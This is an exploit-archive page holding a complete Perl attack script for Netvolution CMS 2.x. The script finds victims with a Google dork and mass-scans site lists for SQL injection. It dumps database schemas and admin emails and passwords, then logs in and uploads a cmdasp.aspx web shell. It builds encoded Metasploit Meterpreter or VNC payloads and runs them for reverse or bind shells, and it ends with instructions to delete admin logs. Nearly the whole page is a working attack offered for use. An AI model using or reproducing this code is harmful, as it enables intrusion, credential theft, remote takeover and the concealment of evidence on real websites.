Netvolution CMS <= 2.x SQL Injection Exploit Script
Posted on 10 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Netvolution CMS <= 2.x SQL Injection Exploit Script</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================== Netvolution CMS <= 2.x SQL Injection Exploit Script =================================================== #!/usr/bin/perl ######################################################################################### # # # Exploit Title: Netvolution exploit script for CMS Version >= 2.xx.xx.xx # # Date: 10/6/2010 # # Sotware Link: www.netvolution.net # # Exploited by: krumel # # Exploit Coded: mr.pr0n # # # # Many thanks to icesurfer (author of SQLNINJA) and all p0wnbox members. # # I have contact www.atcom.gr no response yet, although it seems that they have patch # # partially the software. # ######################################################################################### # # # This program is free software; you can redistribute it and/or # # modify it under the terms of the GNU General Public License # # as published by the Free Software Foundation; either version 2 # # of the License, or (at your option) any later version. # # # # This program is distributed in the hope that it will be useful, # # but WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # # GNU General Public License for more details. # # # # You should have received a copy of the GNU General Public License # # along with this program; if not, write to the Free Software # # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. # # # ######################################################################################### #Using some modules! use LWP::UserAgent; use IO::Socket; use IO::Handle; print "e[1;31m _ _ _ _ _ _ _ _ _ e[0m "; print "e[1;31m | \ | | | | | | | | (_) | | (_) | e[0m "; print "e[1;31m | \| | ___| |___ _____ | |_ _| |_ _ ___ _ __ _____ ___ __ | | ___ _| |_ e[0m "; print "e[1;31m | . ` |/ _ \ __\ \ / / _ \| | | | | __| |/ _ \| '_ \ / _ \ \/ / '_ \| |/ _ \| | __| e[0m "; print "e[1;31m | |\ | __/ |_ \ V / (_) | | |_| | |_| | (_) | | | | | __/> <| |_) | | (_) | | |_ e[0m "; print "e[1;31m |_| \_|\___|\__| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| \___/_/\_\ .__/|_|\___/|_|\__| e[0m "; print "e[1;31m | | e[0m "; print "e[1;31m |_| ...for CMS Version >= 2.xx.xx.xx e[0m "; # ************* # # Target dork. # ************* # print " Google Dork:"; print " e[1;45mallinurl: 'default.asp?pid'e[0m "; # ************ # # Main Menu. # ************ # menu:; print " [*] Main Menu: "; print " 1. Automated list site scan for injection. "; print " 2. Export all Infomation_Schema Tables and Columns. "; print " 3. Find all Databases. "; print " 4. Export all usernames and passwords of the 'cms_Users' table. "; print " 5. Manuall exploitation. "; print " 6. Compatibility with the Metasploit Framework. "; print " 7. Exit. "; print "> "; $option=<STDIN>; print " "; if ($option!=1 && $option!=2 && $option!=3 && $option!=4 && $option!=5 && $option!=6 && $option!=7) { print "e[1;31mWrong Option!!e[0m "; goto menu; } # Select Option. if ($option==1) {&site_scan} # Automated list site scan for injection. if ($option==2) {&info_schema_tables_and_columns}# Export all Infomation_Schema Tables and Columns. if ($option==3) {&extract_db}# Find all Databases. if ($option==4) {&automated_exploitation}# Export all usernames and passwords of the 'cms_Users'table. if ($option==5) {&manually}# Manuall exploitation. if ($option==6) {&metasploit}# Compatibility with Metasploit Project (Under construction). if ($option==7) {&quit}# Quit it! # ******************************************* # # Automated list site scan for injection. # ******************************************* # sub site_scan { $sites= "/Users/pentest/Desktop/sites.txt"; ######## ***[E_D_I_T H_E_R_E]*** ############## $scan = "10+and+1=convert(int,db_name(1))"; # Counter $i = 1; print " [*]Opening site list... "; open (SITELIST, $sites); print " [*]Sitelist opened successfully! "; print " [*]Scanning... "; @sitelist = <SITELIST>; print " [*]Results: "; for ($i; $i <= @sitelist; $i++) { $host = $sitelist[$i]; chop ($host); $int = LWP::UserAgent->new() or die; $check=$int->get($host.$scan); if ($check->content =~ m/value '(.*)' to/g) { print "e[1;36m$hoste[0m "; } } goto menu; } # ********************************************************** # # Exploiting *all* the Infomation_Schema Tables and Columns. # ********************************************************** # sub info_schema_tables_and_columns { # ***************# # Table Counter # ***************# print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=) "; print "> "; $atcom=<STDIN>; print "Enter the range scanning of Tables (e.g.: 15): "; print "> "; $endt =<STDIN>; # Counter $countt = 1; print " [*] Exloiting Information_Schema Tables... "; $infoschema_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables))"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$infoschema_t); if ($check->content =~ m/value '(.*)' to/g) { ($first_t) = $1; print "e[1;33m$first_te[0m "; @chars_t = split(//, "$first_t"); $got_t = join("%", @chars_t); $first_t = "%27$got_t%27"; for ($countt; $countt <= $endt; $countt++) { $fullsqli_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables%20where%20table_name%20not%20in($first_t)))"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$fullsqli_t); if ($check->content =~ m/value '(.*)' to/g) { ($next_t) = $1; print "e[1;33m$next_te[0m "; @chars_t = split(//, "$next_t"); $got_t = join("%", @chars_t); $next_t = $got_t ; $first_t = $first_t.",%27".$next_t."%27"; } } } else { print "e[1;31mFAILED!e[0m "; } # ***************# # Column Counter # ***************# print "Enter the range of scanning Columns (e.g.: 20) "; print "> "; $endc =<STDIN>; # Counter $countc = 1; print "[*] Exloiting Information_Schema Column... "; $infoschema_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns))"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$infoschema_c); if ($check->content =~ m/value '(.*)' to/g) { ($first_c) = $1; print "e[1;33m$first_ce[0m "; @chars_c = split(//, "$first_c"); $got_c = join("%", @chars_c); $first_c = "%27$got_c%27"; for ($countc; $countc <= $endc; $countc++) { $fullsqli_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns%20where%20column_name%20not%20in($first_c)))"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$fullsqli_c); if ($check->content =~ m/value '(.*)' to/g) { ($next_c) = $1; print "e[1;33m$next_ce[0m "; @chars_c = split(//, "$next_c"); $got_c = join("%", @chars_c); $next_c = $got_c ; $first_c = $first_c.",%27".$next_c."%27"; } } } else { print "e[1;31mFAILED!e[0m"; } goto menu; } # *************************************** # # Exploiting *all* the inside Databases. # *************************************** # sub extract_db { print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=) "; print "> "; $atcom=<STDIN>; print "Enter the range of scanning Databases (e.g.: 30) "; print "> "; $enddb =<STDIN>; # Counter $countdb = 1; print "[*] Exloiting the inside Databases.... "; for ($countdb; $countdb <= $enddb; $countdb++) { $db = "10+and+1=convert(int,db_name($countdb))"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$db); if ($check->content =~ m/value '(.*)' to/g) { ($database) = $1; print "[ID:$countdb]","e[1;35m$databasee[0m "; } else { print "e[1;31mFAILED!e[0m "; } } goto menu; } # ***************************************************************** # # Exploiting *all* usernames and passwords of the table "cms_Users" # ***************************************************************** # sub automated_exploitation { print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=) "; print "> "; $atcom=<STDIN>; print "Enter the range of scanning userID (e.g.: 20) "; print "> "; $end =<STDIN>; # Counter $count = 1; print "[*] Exloiting Usernames and Passwords... "; for ($count; $count <= $end; $count++) { $useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29"; $userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$useremail); if ($check->content =~ m/value '(.*)' to/g) { ($email) = $1; print "[ID:$count]"," e[1;32m$emaile[0m"; $gotmail = $email; # Usage for the section of Metasploit Framework. $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$userpassword); if ($check->content =~ m/value '(.*)' to/g){ ($pass) = $1; print " : e[1;32m$passe[0m "; $gotpass = $pass; # Usage for the section of Metasploit Framework. } else { print " : e[1;31m-e[0m "; }} else { print "[ID:$count","] e[1;31m-e[0m : e[1;31m-e[0m "; } } goto menu; } # **************************************** # # Exploiting Columns and Tables manually. # **************************************** # sub manually { print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=) "; print "> "; $atcom=<STDIN>; print "Enter the name of your target's Table (e.g.: cms_Users) "; print "> "; $table =<STDIN>; print "Enter your the name of your target's Column (e.g.: userpassword) "; print "> "; $column =<STDIN>; print "Enter the range of scanning (e.g.: 10) "; print "> "; $endm =<STDIN>; $countm = 1; print "[*] Manuall Exploitation... "; for ($countm; $countm <= $endm; $countm++) { $manually = "10+and+1=convert(int,(se%l%e%c%t(substring($column,1,1000))%20from%20$table%20where%20userID=$countm%29%29"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$manually); if ($check->content =~ m/value '(.*)' to/g){ ($got) = $1; print "[ID:$countm]"," e[1;32m$gote[0m "; } else { print "[ID:$countm","] e[1;31m-e[0m : e[1;31m-e[0m "; } } goto menu; } # ***************************************************************** # # Compatibility with the Metasploit Framework. # ***************************************************************** # sub metasploit { if (($gotmail eq "") or ($gotpass eq "")) { print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=) "; print "> "; $atcom=<STDIN>; $end = 10; $count = 1; for ($count; $count < $end; $count++) { $useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29"; $userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$useremail); if ($check->content =~ m/value '(.*)' to/g) { ($email) = $1; $gotmail = $email; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$userpassword); if ($check->content =~ m/value '(.*)' to/g){ ($pass) = $1; $gotpass = $pass; $end = $count; }} } } if ($atcom =~ m/www.(.*).gr/g){ ($site) = $1; } # Checking if the Metasploit Framework is already installed. print "[*] Looking for the Metasploit Framework... "; $msfcli = ""; $msfpayload = ""; if ($msfpath eq "") { $path1 = $ENV{PATH}; @path = split(/:/,$path1); foreach (@path) { if (-e $_."/msfcli") { $msfcli = $_."/msfcli"; } elsif (-e $_."/msfcli3") { $msfcli = $_."/msfcli3"; } if (-e $_."/msfpayload") { $msfpayload = $_."/msfpayload"; } elsif (-e $_."/msfpayload3") { $msfpayload = $_."/msfpayload3"; } } } else { if (-e $msfpath."/msfcli") { $msfcli = $msfpath."msfcli"; } elsif (-e $msfpath."/msfcli3") { $msfcli = $msfpath."msfcli3"; } if (-e $msfpath."/msfpayload") { $msfpayload = $msfpath."msfpayload"; } elsif (-e $msfpath."/msfpayload3") { $msfpayload = $msfpath."msfpayload3"; } } if ($msfcli eq ""){ print "[e[1;31m FAILED e[0m] "; print "[-] msfcli not found "; exit(-1); } if ($msfpayload eq "") { print "[e[1;32m FAILED e[0m] "; print "[-] msfpayload not found "; exit(-1); } print "[e[1;32m DONE e[0m] "; #Retrieve Cookie system('curl -k -L -b cookies.txt -c cookies.txt -o step-1.html http://www.'.$site.'.gr/'); system('curl -k -L -b cookies.txt -c cookies.txt -d email='.$gotmail.' -d password='.$gotpass.' -o step-2.html http://www.'.$site.'.gr/admin/default.asp?ac=2'); #Upload Web-Backdoor system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@cmdasp.aspx http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles'); # Choose your payload. print "Which payload you want to use? "; print " 1. Meterpreter 2. VNC "; while (($payload ne 1) and ($payload ne 2)) { print "msf > "; $payload = <STDIN>; chomp($payload); } if ($payload == 1) { $payload = "meterpreter"; } else { $payload = "vncinject"; } # Choose your connection. print "Which type of connection you want to use? "; print " 1. bind_tcp 2. reverse_tcp "; while (($conn ne "1") and ($conn ne "2")) { print "msf > "; $conn = <STDIN>; chomp($conn); } if ($conn == 1) { $conn = "bind_tcp"; } else { $conn = "reverse_tcp"; } if ($conn eq "bind_tcp"){ print "Enter your Remote host "; print "msf > "; $rhost = <STDIN>; chomp $rhost } else { print "Enter your Public IP "; print "msf > "; $lhost = <STDIN>; chomp $lhost ; print "Enter your Local Host "; print "msf > "; $lhost1 = <STDIN>; chomp $lhost1 ; } if ($conn eq "bind_tcp"){ print "Enter Remote port number "; } else { print "Enter local port number "; } $port = 0; while (($port < 1) or ($port > 65535)){ print "msf > "; $port = <STDIN>; chomp($port); } # Choose your Encryption. $enc = -1; print "[*] Choose a payload encoding method: ". " 0. None ". " 1. Alpha2 Alphanumeric Mixedcase ". " 2. Alpha2 Alphanumeric Uppercase ". " 3. Avoid UTF8/tolower ". " 4. Call+4 Dword XOR ". " 5. Single-byte XOR Countdown ". " 6. Variable-length Fnstenv/mov Dword XOR ". " 7. Polymorphic Jump/Call XOR Additive Feedback ". " 8. Non-Alpha ". " 9. Non-Upper ". " 10. Polymorphic XOR Additive Feedback ". " 11. Alpha2 Alphanumeric Unicode Mixedcase ". " 12. Alpha2 Alphanumeric Unicode Uppercase "; while (($enc < 0) or ($enc > 12)) { print "msf > "; $enc = <STDIN>; chomp($enc); } $encoder = " encoder="; for ($enc) { /^0$/ && do {$encoder = ""}; /^1$/ && do {$encoder .= "x86/alpha_mixed "}; /^2$/ && do {$encoder .= "x86/alpha_upper "}; /^3$/ && do {$encoder .= "x86/avoid_utf8_tolower "}; /^4$/ && do {$encoder .= "x86/call4_dword_xor "}; /^5$/ && do {$encoder .= "x86/countdown "}; /^6$/ && do {$encoder .= "x86/fnstenv_mov "}; /^7$/ && do {$encoder .= "x86/jmp_call_additive "}; /^8$/ && do {$encoder .= "x86/nonalpha "}; /^9$/ && do {$encoder .= "x86/nonupper "}; /^10$/ && do {$encoder .= "x86/shikata_ga_nai "}; /^11$/ && do {$encoder .= "x86/unicode_mixed "}; /^12$/ && do {$encoder .= "x86/unicode_upper "}; } # Creation of the executable payload. $exe = "backup".int(rand()*010101); $command = $msfpayload." windows/".$payload."/".$conn.$encoder." exitfunc=process"; if ($conn eq "bind_tcp") { $command .= " lport=".$port." X > /tmp/".$exe.".exe"; } else { $command .= " lport=".$port." lhost=".$lhost." X "."> /tmp/".$exe.".exe"; } if ($verbose == 1) { print "[v] Command: ".$command." "; } system ($command); unless (-e "/tmp/".$exe.".exe") { print "[-] Payload creation... [e[1;31m FAILED e[0m] "; exit(-1); } print "[*] Payload creation... [e[1;32m DONE e[0m] "; print "[*] Payload (".$exe.".exe) created. "; $xpl = '/tmp/'.$exe.'.exe'; #Upload the executable file to the remote Webserver. system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@'.$xpl.' http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles'); $parameter = $exe.".exe"; # The child handles the request to the target, the parent calls Metasploit Framework! $pid = fork(); if ($pid eq 0) { sleep(1); exit(0); } # This is the parent. $syscommand = $msfcli." exploit/multi/handler "."PAYLOAD=windows/".$payload."/".$conn." "; if ($conn eq "bind_tcp") { $syscommand .= "LPORT=".$port." RHOST=".$rhost." E"; print "e[1;34m$syscommande[0m "; } else { $syscommand .= "LPORT=".$port." LHOST=".$lhost1." E"; print "e[1;34m$syscommande[0m "; } #Execute msfcli print "Are you ready to execute msfcli? (Press Enter) "; print "msf > "; $enter = <STDIN>; chomp($enter); print " Please Wait..."; print "[*] Executing the msfcli... [e[1;32m DONE e[0m] "; system("xterm -bg black -fg white -bd black -e ".$syscommand." &"); # If you don't have xterm, install IT! sleep(30); # Sleep 30 seconds to fire up Metasploit Framework! #Execute metasploit shell throught Web-Backdoor (cmdasp.aspx). system('curl -k -L -b /tmp/cookies.txt -c /tmp/cookies.txt -d __VIEWSTATE=%2FwEPDwULLTE2MjA0MDg4ODhkZKAYI%2BuShUtjaEQHez7lnHYtwecj -d txtArg="C:InetpubEventSitesenterpriseitsecurity.grfiles\'.$parameter.'" -d testing=excute -d __EVENTVALIDATION=%2FwEWAwLw6bCOCgKa%2B%2BKPCgKBwth5tWrCE%2BPx6jReXWdJAVRgAZWRoxo%3D http://www.'.$site.'.gr/files/cmdasp.aspx'); } print "# ******************************************************************************# "; print "# CAUTION CAUTION CAUTION CAUTION CAUTION *# "; print "# ******************************************************************************# "; print "# In Order to delete the logs go to http://www.target.gr/files/cmdasp.aspx *# "; print "# and execute the following command : *# "; print "# *# "; print "# sqlcmd -S target_IP -U Database_User -P Database_Password -d Target_Database *# "; print "# -Q ''delete from cms_AdminLog where logRecDbTable='Your_Public_IP' '' -u *# "; print "# *# "; print "# The Username and password for the Database can be found inside global.asa *# "; print "# ******************************************************************************# "; # ***********# # Quitting :D # ***********# sub quit { print "e[1;31mExiting...Bye-Bye!e[0m "; exit(1); } # ***************************************************************** # # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
